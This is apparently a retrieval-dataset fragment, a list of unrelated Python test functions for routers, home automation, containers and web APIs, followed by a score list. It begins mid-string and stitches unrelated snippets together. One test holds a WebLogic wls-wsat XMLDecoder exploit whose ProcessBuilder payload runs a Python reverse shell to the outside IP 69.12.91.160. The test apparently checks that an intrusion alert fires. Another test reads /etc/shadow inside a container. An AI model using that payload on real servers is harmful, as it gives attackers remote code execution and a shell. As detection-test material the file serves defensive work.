<irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>mpls.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>__mpls-oam__.mpls.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-route-count>5</irib-route-count>\n <irib-active-count>5</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.2</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.3</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>l2circuit.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>mdt.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>l2protection.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>lsdist.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>lsdist.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inetcolor.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6color.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>5</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"SA_INSTANCE_TEXT\"] = \"\"\"\nInstance Type\n Primary RIB Active/holddown/hidden\nmaster forwarding\n inet.0 18/0/0\n\n__juniper_private1__ forwarding\n __juniper_private1__.inet.0 6/0/0\n\n__juniper_private2__ forwarding\n __juniper_private2__.inet.0 0/0/1\n\n__juniper_private3__ forwarding\n\n__juniper_private4__ forwarding\n __juniper_private4__.inet.0 2/0/0\n\n__master.anon__ forwarding\n \"\"\"", "def test(self):\n exploit = \"\"\"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>/bin/sh</string>\n </void>\n <void index=\"1\">\n <string>-c</string>\n </void>\n <void index=\"2\">\n <string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.c\"\"\" \\\n \"\"\"onnect((\"69.12.91.160\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=\"\"\" \\\n \"\"\"subprocess.call([\"/bin/sh\",\"-i\"]);'</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\"\"\"\n requests.post(\"http://127.0.0.1:{}/wls-wsat/CoordinatorPortType\".format(WEBLOGIC_PORT), data=exploit)\n\n return [WEBLOGIC_ALERT_TYPE_NAME]", "async def test_get_fleet_maintenance_list(client):\n group_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/maintenance/list',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_api_fire_event_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(event):\n \"\"\"Record that our event got called.\n\n Also test if our data came through.\n \"\"\"\n if \"test\" in event.data:\n test_value.append(1)\n\n hass.bus.async_listen_once(\"test_event_with_data\", listener)\n\n await mock_api_client.post(\"/api/events/test_event_with_data\", json={\"test\": 1})\n\n await hass.async_block_till_done()\n\n assert len(test_value) == 1", "async def test_api_call_service_bad_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\n \"test_domain\", \"test_service\", listener, schema=vol.Schema({\"hello\": str})\n )\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"hello\": 5}\n )\n assert resp.status == HTTPStatus.BAD_REQUEST", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url", "async def test_service_refresh_devices_trigger_no_state_update(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n data = {\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n }\n }\n with patch.dict(DECONZ_WEB_REQUEST, data):\n config_entry = await setup_deconz_integration(hass, aioclient_mock)\n\n assert len(hass.states.async_all()) == 1\n\n captured_events = async_capture_events(hass, CONF_DECONZ_EVENT)\n\n aioclient_mock.clear_requests()\n\n data = {\n \"config\": {},\n \"groups\": {\n \"1\": {\n \"id\": \"Group 1 id\",\n \"name\": \"Group 1 name\",\n \"type\": \"LightGroup\",\n \"state\": {},\n \"action\": {},\n \"scenes\": [{\"id\": \"1\", \"name\": \"Scene 1\"}],\n \"lights\": [\"1\"],\n }\n },\n \"lights\": {\n \"1\": {\n \"name\": \"Light 1 name\",\n \"state\": {\"reachable\": True},\n \"type\": \"Light\",\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n }\n\n mock_deconz_request(aioclient_mock, config_entry.data, data)\n\n await hass.services.async_call(\n DECONZ_DOMAIN, SERVICE_DEVICE_REFRESH, service_data={CONF_BRIDGE_ID: BRIDGEID}\n )\n await hass.async_block_till_done()\n\n assert len(hass.states.async_all()) == 5\n assert len(captured_events) == 0", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file()\n\n config_filename = 'testsuite_cfg.json'\n args.config = config_filename\n config_file = open(config_filename, 'w')\n config_file.write(str(json.dumps(config)))\n config_file.close()\n\n execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app1', 'epg1')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app2', 'epg2')\n mac3 = '00:11:22:33:33:36'\n ip3 = '3.4.3.7'\n self.add_endpoint(mac3, ip3, 'intersite-testsuite', 'app2', 'epg2')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app1-epg1'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app2-epg2'))\n self.assertTrue(self.verify_remote_site_has_entry(mac3, ip3, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app2-epg2'))", "def test_build_payload(self):\n pytrend = TrendReq()\n pytrend.build_payload(kw_list=['pizza', 'bagel'])\n self.assertIsNotNone(pytrend.token_payload)", "def test_container_cycle(self):\n # Before Create\n print(\"Create\")\n rep = post(self.url + \"/search\", data={'name': name})\n self.errorCatch(rep)\n\n # Create\n rep = post(self.url + \"/create\", data={\n 'image': default_image,\n 'homepath': \"/nashome/guest/test\",\n 'naspath': \"/home/nas/test\",\n 'command': \"tail -f /dev/null\",\n 'name': name})\n self.checkRunning()\n\n # Double create\n rep = post(self.url + \"/create\", data={\n 'image': default_image,\n 'homepath': \"/nashome/guest/test\",\n 'naspath': \"/home/nas/test\",\n 'command': \"tail -f /dev/null\",\n 'name': name})\n self.errorCatch(rep)\n\n # Check by api\n con = client.containers.get(name)\n self.assertIn(\"tmp0\", con.exec_run(\"ls /home/nas\").output.decode())\n self.assertIn(\"tmp1\", con.exec_run(\"ls /home/ubuntu\").output.decode())\n self.assertEqual(con.status, \"running\")\n\n # Stop\n con.exec_run(\"touch /opt/tmp2\").output.decode()\n print(\"Stop\")\n rep = post(self.url + \"/stop\", data={'name': name})\n self.checkOK(rep)\n\n # check stop\n rep = post(self.url + \"/search\", data={'name': name})\n self.checkOK(rep)\n rep = rep.json()\n self.assertIsInstance(rep[\"data\"], dict)\n self.assertEqual(rep['data']['status'], \"exited\")\n\n # start\n print(\"Resume\")\n rep = post(self.url + \"/start\", data={'name': name})\n self.checkOK(rep)\n self.checkRunning()\n con = client.containers.get(name)\n self.assertIn(\"tmp2\", con.exec_run(\"ls /opt\").output.decode())\n\n # change pw\n print(\"Change Password\")\n con.exec_run(\"adduser ubuntu\")\n rep = post(self.url + \"/passwd\", data={'name': name,\n 'pw': \"tmpPW\"})\n self.checkOK(rep)\n self.assertIn(\"tmpPW\", con.exec_run(\"cat /etc/shadow\").output.decode())\n\n # commit\n print(\"Commit\")\n rep = post(self.url + \"/commit\", data={'name': name,\n 'newname': name})\n self.checkOK(rep)\n\n # search image\n rep = post(self.url + \"/search/image\", data={'name': name})\n rep = rep.json()\n self.assertIsInstance(rep['data'], dict)\n\n # delete\n print(\"Delete\")\n rep = post(self.url + \"/delete\", data={'name': name})\n self.checkOK(rep)\n\n # check delete\n rep = post(self.url + \"/search\", data={'name': name})\n self.errorCatch(rep)\n\n # Delete Image\n print(\"Delete Image\")\n rep = post(self.url + \"/delete/image\", data={'name': name})\n self.checkOK(rep)\n\n # Check if delete it\n rep = post(self.url + \"/search/image\", data={'name': name})\n self.errorCatch(rep)", "def test_turnon(\n fauxmo_server: pytest.fixture, simplehttpplugin_target: pytest.fixture\n) -> None:\n data = (\n b'SOAPACTION: \"urn:Belkin:service:basicevent:1#SetBinaryState\"'\n b\"<BinaryState>1</BinaryState>\"\n )\n\n resp = requests.post(\n \"http://127.0.0.1:12345/upnp/control/basicevent1\", data=data\n )\n assert resp.status_code == 200", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_fax_inbound_automation_post(self):\n pass", "def invoke():\n # CONFIG: Read configuration information\n config = conf.get_yaml_field(gl.configFile)\n dd_enable = config['ENABLE_DDING']\n dd_token = config['DD_TOKEN']\n dd_url = config['DING_URL']\n email_enable = config['EMAIL_ENABLE']\n # END CONFIG.\n\n # Test report file name.\n time_str = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n path = RunTestCase.create_report_file()\n\n # Start test the send pin message.\n if dd_enable:\n scripts.send_msg_dding(\n '{}:★开始API接口自动化测试★'.format(time_str),\n dd_token,\n dd_url\n )\n\n # Execute the test and send the test report.\n RunTestCase.run(path)\n if dd_enable:\n # Template message.\n dir_list = path.split('\\\\')\n low_path = dir_list[len(dir_list) - 2]\n msg = RunTestCase.tmpl_msg(low_path)\n print(msg)\n scripts.send_msg_dding(msg, dd_token, dd_url)\n\n if email_enable:\n # Send test report to EMAIL.\n email = EmailClass()\n email.send(path)", "def test_get_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"Get master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, name=\"master\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n\n print(\"Get all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_MULTI_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 8)\n self.assertEqual(int(response[5][\"instance_rib_irib_active_count\"]), 2)\n\n print(\"Get brief all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_BRIEF\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(int(response[0][\"instance_rib_irib_active_count\"]), 18)\n\n print(\"Get detail all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_DETAIL\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(response[0][\"router_id\"], \"10.208.133.147\")\n\n print(\"Get extensive all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 18)\n self.assertEqual(response[17][\"instance_rib_irib_name\"], \"inet6color.0\")\n\n print(\"Get summary all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertGreaterEqual(len(response), 1)\n\n print(\"Get route instance info by text and more options\")\n mock_execute_cli_command_on_device.return_value = self.response[\"SA_INSTANCE_TEXT\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, return_mode=\"text\", more_options=\"summary\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, str)\n self.assertRegex(response, r\"__juniper_private1__.inet.0\")\n\n print(\"Invalid return_mode value\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n self.assertRaisesRegex(\n ValueError,\n r\"'return_mode' must be 'ENTRY_LIST' or 'TEXT'\",\n self.ins.get_route_instance_entry,\n device=mock_device_ins, return_mode=\"Unknown\",\n )\n\n print(\"Cannot get response from device\")\n mock_execute_cli_command_on_device.return_value = False\n response = self.ins.get_route_instance_entry(device=mock_device_ins, more_options=\"summary\")\n self.assertFalse(response)", "def test_run(self) -> None:\n startDate = dt.datetime.now() - dt.timedelta(days=1)\n endDate = startDate\n\n rawFreqCreator = RawFrequencyCreationHandler(\n self.appConfig['rawFrequencyCreationServiceUrl'])\n resp = rawFreqCreator.createRawFrequency(startDate, endDate)\n self.assertTrue(resp['isSuccess'])\n self.assertTrue(resp['status'] == 200)\n self.assertTrue('message' in resp)", "def run(self,base_url):\n\n url = base_url + self.endpoint\n\n if self.method.upper() == \"GET\":\n r = requests.get(url)\n\n elif self.method.upper() == \"POST\":\n\n if self.payload is not None:\n r = requests.post(url, json=self.payload)\n else:\n r = requests.post(url)\n\n else:\n msg = \"Malformed test. Allowed methods are GET and POST\"\n return get_failure_object(msg)\n\n try:\n\n resp = r.json()\n\n except ValueError as e:\n\n msg = \"Could not decode JSON from response.\"\n return get_failure_object(msg)\n\n try:\n\n # Run all checks for expected exact JSON response values\n for check_key in self.expected_values:\n\n exp_val = self.expected_values[check_key]\n\n if exp_val != resp[check_key]:\n\n msg = \"Expected value '%s' at key '%s' but got '%s'.\" \\\n % (str(exp_val), str(check_key), str(resp[check_key]))\n\n return get_failure_object(msg)\n\n # Run all checks for expected types in JSON response\n for check_key in self.expected_types:\n\n exp_type = self.expected_types[check_key]\n val = resp[check_key]\n\n if exp_type == \"string\":\n type_res = test_expected_type(val, str)\n\n elif exp_type == \"int\":\n type_res = test_expected_type(val, int)\n\n elif exp_type == \"float\":\n type_res = test_expected_type(val, float)\n\n else:\n msg = \"Malformed test. Expected types allowed: 'str',\\\n 'int', 'float'\"\n return {\"status\": \"FAILED\", \"error_msg\": msg}\n\n if type_res == False:\n msg = get_expected_type_error_message(check_key, val, exp_type)\n return get_failure_object(msg)\n\n return {\"status\":\"PASSED\"}\n\n except KeyError as e:\n msg = \"Expected key '%s' not found.\" % str(e.args[0])\n return get_failure_object(msg)", "def setUp(self):\n super(TestSyncServiceRisk, self).setUp()\n self.api = ExternalApiClient()", "def test_for_client():", "def test_request_spartan_grasp(self, *args, **kwargs):\n self.taskRunner.callOnThread(self.request_spartan_grasp, *args, **kwargs)", "def test_api_new_game(self):\n\n with self.client as client:\n ...\n # write a test for this route", "async def test_18() -> None:\n LOG.debug(\"Test post query (end < start)\")\n payload = {\n \"referenceName\": \"MT\",\n \"start\": 9,\n \"end\": 8,\n \"referenceBases\": \"T\",\n \"variantType\": \"SNP\",\n \"assemblyId\": \"GRCh38\",\n \"includeDatasetResponses\": \"HIT\",\n }\n async with aiohttp.ClientSession() as session:\n async with session.post(\"http://localhost:5050/query\", data=json.dumps(payload)) as resp:\n data = await resp.json()\n assert data[\"exists\"] is None, sys.exit(\"Query POST Endpoint Error!\")\n assert resp.status == 400, \"HTTP Status code error\"", "def test_get_query_with_api_key(self):\r\n users = UserFactory.create_batch(3)\r\n app = AppFactory.create(owner=users[0], info={'total': 150})\r\n task = TaskFactory.create(app=app, info={'url': 'my url'})\r\n taskrun = TaskRunFactory.create(task=task, user=users[0],\r\n info={'answer': 'annakarenina'})\r\n for endpoint in self.endpoints:\r\n url = '/api/' + endpoint + '?api_key=' + users[1].api_key\r\n res = self.app.get(url)\r\n data = json.loads(res.data)\r\n\r\n if endpoint == 'app':\r\n assert len(data) == 1, data\r\n app = data[0]\r\n assert app['info']['total'] == 150, data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'task':\r\n assert len(data) == 1, data\r\n task = data[0]\r\n assert task['info']['url'] == 'my url', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'taskrun':\r\n assert len(data) == 1, data\r\n taskrun = data[0]\r\n assert taskrun['info']['answer'] == 'annakarenina', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'user':\r\n assert len(data) == 3, data\r\n user = data[0]\r\n assert user['name'] == 'user1', data\r\n assert res.mimetype == 'application/json', res", "async def test_report_registration():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n server = OpenADRServer(vtn_id='testvtn')\n server.add_handler('on_register_report', on_register_report)\n server.add_handler('on_create_party_registration', on_create_party_registration)\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b',)\n\n # Add 4 reports\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device001',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device002',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n unit='V')\n\n asyncio.create_task(server.run_async())\n #await asyncio.sleep(1)\n # Register the client\n await client.create_party_registration()\n\n # Register the reports\n await client.register_reports(client.reports)\n assert len(client.report_requests) == 2\n assert len(server.services['report_service'].report_callbacks) == 4\n await client.stop()\n await server.stop()", "def test_start_stop_fn(self, runpath):\n\n driver = self.MyDriver(\n name=\"MyDriver\",\n runpath=runpath,\n pre_start=pre_start_fn,\n post_start=post_start_fn,\n pre_stop=pre_stop_fn,\n post_stop=post_stop_fn,\n )\n\n assert not driver.pre_start_fn_called\n assert not driver.post_start_fn_called\n\n with driver:\n assert driver.pre_start_fn_called\n assert driver.post_start_fn_called\n assert not driver.pre_stop_fn_called\n assert not driver.post_stop_fn_called\n\n assert driver.pre_stop_fn_called\n assert driver.post_stop_fn_called", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "def testEndpoint(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # With no UID given\n status, _ = self._http_get(\"/endpoint\")\n\n # Check result\n self.assertEqual(status, 404)\n\n # Register a service\n svc_reg = context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Request the details of the endpoint\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 200)\n\n # Check the content\n data = json.loads(response)\n for key, attr in (('uid', 'uid'), ('sender', 'framework'),\n ('name', 'name')):\n self.assertEqual(data[key], getattr(endpoint, attr))\n\n # Unregister it\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, _ = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 404)", "def test_device_registration(self):\n sensor = self._get_dummy_sensor()\n responses = []\n sensor.set_response_callback(func=lambda response: responses.append(response))\n sensor.register()\n time.sleep(wait_seconds)\n for response in responses:\n print(json.loads(response.content.decode()))\n assert len(responses) > 0\n assert json.loads(responses[0].content.decode())['module_name'] == 'test_get_sensor'\n sensor.stopped.set()" ]
[ "0.8207508", "0.7297929", "0.7013963", "0.6848967", "0.6562138", "0.64560413", "0.6252057", "0.6184207", "0.61758155", "0.6018559", "0.59301925", "0.5880597", "0.5861513", "0.58101547", "0.57913876", "0.57734543", "0.5742188", "0.57399577", "0.57374406", "0.5709208", "0.56703967", "0.5647022", "0.56444365", "0.563619", "0.5635471", "0.5630741", "0.5630347", "0.5620383", "0.5609603", "0.5599015", "0.55885965", "0.5560776", "0.55403227", "0.5531847", "0.5529369", "0.5523128", "0.5514623", "0.54984355", "0.54969287", "0.54775023", "0.5466454", "0.5464824", "0.54565793", "0.5443158", "0.5441289", "0.5437322", "0.54294723", "0.54250413", "0.5424698", "0.542399", "0.54201704", "0.5419394", "0.5414556", "0.5400639", "0.5398801", "0.5393299", "0.5389553", "0.53854257", "0.5376864", "0.5368618", "0.53679377", "0.5363499", "0.5362014", "0.53616774", "0.5349093", "0.53490674", "0.534794", "0.5343957", "0.5334221", "0.53335696", "0.5324502", "0.531889", "0.53186876", "0.53132755", "0.5309383", "0.53063536", "0.5306086", "0.53052026", "0.52994263", "0.52984405", "0.52972215", "0.5286472", "0.52862114", "0.52854055", "0.52770466", "0.52737737", "0.5271821", "0.52613163", "0.525766", "0.5255903", "0.5244013", "0.523769", "0.5235934", "0.5234945", "0.5232811", "0.52170146", "0.52169126", "0.5213415", "0.5210246", "0.5206353" ]
0.85035634
0
Test POSTing a start and a stop registry and expect get it at Call API Endpoint using a call_id Test uses start_call_fx fixture Test uses stop_call_fx fixture
def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client, start_call_fx, stop_call_fx): post_url = reverse_lazy('calls:registry-list') post_data = [start_call_fx, stop_call_fx] for data in post_data: response = client.post(post_url, data, content_type='application/json') assert response.status_code == status.HTTP_201_CREATED get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1}) response = client.get(get_url) assert response.data.get('start_timestamp') assert response.data.get('stop_timestamp')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def 